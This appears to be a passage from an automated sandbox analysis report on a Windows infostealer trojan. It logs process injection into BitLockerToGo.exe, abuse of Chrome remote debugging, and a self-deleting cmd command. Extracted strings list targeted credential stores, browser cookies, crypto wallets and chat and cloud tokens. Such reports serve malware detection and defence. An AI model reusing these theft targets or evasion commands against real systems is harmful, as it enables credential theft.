              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\srq9h" & exitJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2288,i,14542950946606832466,4016932128899336426,262144 /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic file information: File size 6694400 > 1048576
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2df200
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x2be800
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: vdr1.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966719770.000000000A142000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000004.00000002.2691298161.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wtjw4e.4.dr
              Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000004.00000002.2691298161.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wtjw4e.4.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966719770.000000000A142000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: section name: .symtab
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\srq9h\wtjw4eJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\srq9h\wtjw4eJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\ProgramData\srq9h\wtjw4eJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E886 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0040E886
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDropped PE file which has not been started: C:\ProgramData\srq9h\wtjw4eJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_4-11554
              Source: C:\Windows\SysWOW64\timeout.exe TID: 8144Thread sleep count: 84 > 30Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,4_2_00407891
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,4_2_0040A69C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00408776
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,4_2_00413B10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,4_2_004013DA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00406784
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,4_2_00411187
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00412A5D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_00409C78
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00408224
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00412539
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411BD2 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00411BD2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411722 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,4_2_00411722
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040DF8C GetSystemInfo,wsprintfA,4_2_0040DF8C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
